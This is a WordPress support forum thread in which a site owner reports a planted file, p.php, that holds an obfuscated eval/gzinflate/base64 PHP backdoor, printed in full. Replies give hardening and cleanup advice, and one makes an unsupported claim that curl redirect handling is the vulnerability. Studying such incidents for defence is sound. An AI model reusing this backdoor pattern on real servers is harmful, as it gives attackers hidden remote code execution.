WordPress.org

Ready to get started?Download WordPress

Forums

WordPress 2.7 Vulnerability? (3 posts)

  1. mcupples1
    Member
    Posted 5 years ago #

    Hello all! There's a problem I've got with the new WordPress in that I just found this file:

    <?php if(isset($_GET['p'])){eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/j
    AuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hk
    pXvJGpiMeA7tF2+duRmeUi/+AQ==')));}?>

    called p.php in my wordpress directory. It was placed there on the 14th. Our site went down today at roughly 8am because of several hundred computers all going to:

    /p.php?p=1-3897
    /p.php?p=1-2910

    etc.

    Any ideas on how to make sure this issue won't happen again? I've since moved p.php to a directory not accessible via the web.

    Thanks!

  2. That's not necessarily a sign of a 2.7 vulnerability. It's your host that did get compromised. Moving or removing the file is good, but you need to find and close the door that let that onto your blog.

    Check your file and directory permissions for your website. You should read up these links

    http://codex.wordpress.org/Hardening_WordPress

    and

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

    Check your user table for any new accounts that you don't recognize. You can use phpMyAdmin or mysql on the command line like so:

    USE yourwordpressdb;
    SELECT * FROM wp_users;

    This is just to see how bad the compromise is. If you are not seeing spammy hidden links in your blogs HTML, and you don't see any users that you don't recognize then WordPress may be fine.

    If you do find spammy links and new unknown users then get ready to restore your last good backup from before 12/14.

    Check your logs for the first occurrence of p.php to see if you can identify when and how it got on your blog.

    Read Donncha's post and also check out http://ocaoimh.ie/2008/06/26/wordpress-exploit-scanner-01/.

    Good luck.

  3. gasyoun
    Member
    Posted 5 years ago #

    CURL is the wordpress vulnerability 2.7+

    class WP_Http_Curl {
    	function request($url, $args = array()) {
    		if ( !ini_get('safe_mode') && !ini_get('open_basedir') )
    			curl_setopt( $handle, CURLOPT_FOLLOWLOCATION, true );
    function wp_remote_get($url, $args = array()) {
    	$objFetchSite = _wp_http_get_object();
    
    	return $objFetchSite->get($url, $args);
    }

    Read http://antichat.ru/threadedpost1298124.html#post1298124 with google translator, this is why there are so many wordpress trojans. Kill 'em.

Topic Closed

This topic has been closed to new replies.

About this Topic